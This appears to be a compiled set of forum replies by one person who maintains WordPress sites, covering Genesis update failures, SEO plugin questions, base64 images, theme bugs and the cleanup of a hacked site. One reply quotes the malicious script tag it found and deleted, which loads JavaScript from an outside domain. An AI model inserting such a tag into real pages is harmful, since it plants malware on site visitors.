  • Website academy – you solved it! Yes, as soon as I disabled White Label all the updates (and there were a lot) were visible and I’ve just updated Genesis and Wordpres (which is now 5.2). Thank you : )

I’m having this same issue on a website I’ve inherited and which I do maintenance on. It has a Genesis child theme. There’s a notification to upgrade Genesis in the dashboard, but when I click on this I get a page saying ‘click here to complete the upgrade’, when I do this I’m re-directed to the theme settings page and the notification ‘Genesis 2.7.2 is available. Check out what’s new or update now.’ reappears at the top of the page and it hasn’t updated.

It also says that WordPress is up to date at 4.9.8, so no notification to upgrade to 5. I have tried ‘check again’, but says wordpress is up to date.

I was until about a month ago updating plugins, in fact I’m sure I updated some just a couple of weeks ago. However, I now notifications at the top of the dashboard about two premium plugins needing updates, however when I go to plugins these updates are not visible.

I’ve maintained this site for 3 years and never had any problems before. I have other sites using the same host and have experienced no problems upgrading Genesis or WordPress on these.

I’m going to investigate further and if I find a solution, I’ll post it here. If others can do the same it would be helpful for everyone. One of the problems I have is that even though I have a verified Genesis theme installed, because I didn’t build the site, I have no access to Genesis help and support/login.

I’m concerned as the client wants some major changes in the new year, I’d like the software to be up to date before I start these….

Thanks in advance to anyone who can help

    Thanks for your reply.

I’ve now gone with a different gallery plugin – will check this out again on the next project..

To be honest, it looks ok with the colour as the background so going ahead with that. But it’s still a compromise (however small…)

Fixed it – I’d missed out deleting all the malware – this was there – <script src=’https://json.stringengines.com/pson.js?n=1&#8242; type=’text/javascript’> – have now deleted it and the site has sped up no end! Thanks

Thanks for getting back to me. It’s a really old theme, I can’t find any reference to it anywhere… I’ve now guessed at which is the malware text in the header and removed it – wordfence has verified this in its scan.

The problem I have now is that it’s still very slow as there is a lot of conflicting scripts – caused by old plugins which are not even on wordpress any more.

I’ll see if I can identify these – I’ll try deactivating plugins to see where the problem is. Maybe there’s a plugin I can use to help mend the scripts – I’ll see – I’m not great with script!

Anyway thanks for the suggestion and help…

    1. I started a new thread as you had marked the previous message as resolved.

    2. As I said I inherited the website. It has the licence number in the dashboard, but is starred out. I have no login for the pro support forums even though the site has pro AIOSEOP installed.

Considering this is the only experience I have of AIOSEOP (I usually use Yoast), and was interested to find out the difference between Yoast and your plugin (which was better etc.), and the fact that I discovered the nofollow and noindex information from the Yoast blog (by googling the problem), I can’t say I’m impressed by the answers I’ve got from you.

First you blame wordpress – could you expand on that – have you come across this problem before, do you think it’s a conflicting plugin, is it wordpress itself (I’ve not had this problem on any other site), could it be the database etc.

    Then you refer me elsewhere.

Are you able to answer the question or am I back to square one again?

As you can see from what I’ve said, I’m trying to eliminate possible causes and to find out whether ticking the nofollow or noindex pagninate pages could be the root of the problem.

A simple yes or no would suffice please…

    Thank you in advance…

    Hi

Thanks for this – yes I’ve activated the plugin again and the issue has been fixed.

    Thanks for letting me know.

    Hi

It worked! Even though the base64 html code is about 50 lines – much longer than yours.

I used – https://www.askapache.com/online-tools/base64-image-converter/ – if you know of any others it would be useful, however, I’m just pleased it worked!

Thanks so much for your help.

    Hi

Thanks for getting back to me.

I’ve never heard of base64, but have found an online image converter for this and will give it a try.

Will let you know if it works…

    Thanks

    Hi

It’s a one page website and the video is the first thing you see.

    https://qpromotions.net

I’ve still not heard back from the Brooklyn theme makers and I will have to revert the site back to how it was before I did the theme update later today as the client has run out of patience.

We’ve now moved the development site to test this elsewhere.

The copy of the site on my home server is also now playing up – which is kind of a relief as I now know it’s not the server/host. I think the problem is the javascript file you mentioned earlier – I’ve alerted the theme makers to this but after 7 days the site needs to be working now…

    Thanks for all your help.

    Hi

The theme authors (united themes) also produce the plugin – it’s part of the theme package.

I think the video problem is separate – it’s a youtube video and there are various options for this section (eg. a slider, a static image) and this is the video option.

I have raised the problem with the theme makers, but it’s been passed onto the developers but they are taking a long time getting back to me. The client is understandably not happy at all and is pushing for me to revert the site back to its previous state – or even change host.

The animations should look like this: https://goodwordpressthemes.com/quintessential/ – this is where I built the site.

Do let me know if you need any further details – but obviously I can’t put logins etc. onto a forum.

Many thanks for looking at this.

    Hi

    No it’s not there!

However, it’s not there in the files on my home server either – so not sure why it was working there?

I’ve also checked the theme update files I used and it’s not there either.

But it does make sense, I built the site using mainly shortcodes rather than composer, and it’s the shortcode sections which aren’t pulling through.

What do you suggest I do now?

Should I alert the theme makers?

My client is also having problems viewing the video on mobile, could this also be related?

    Thanks
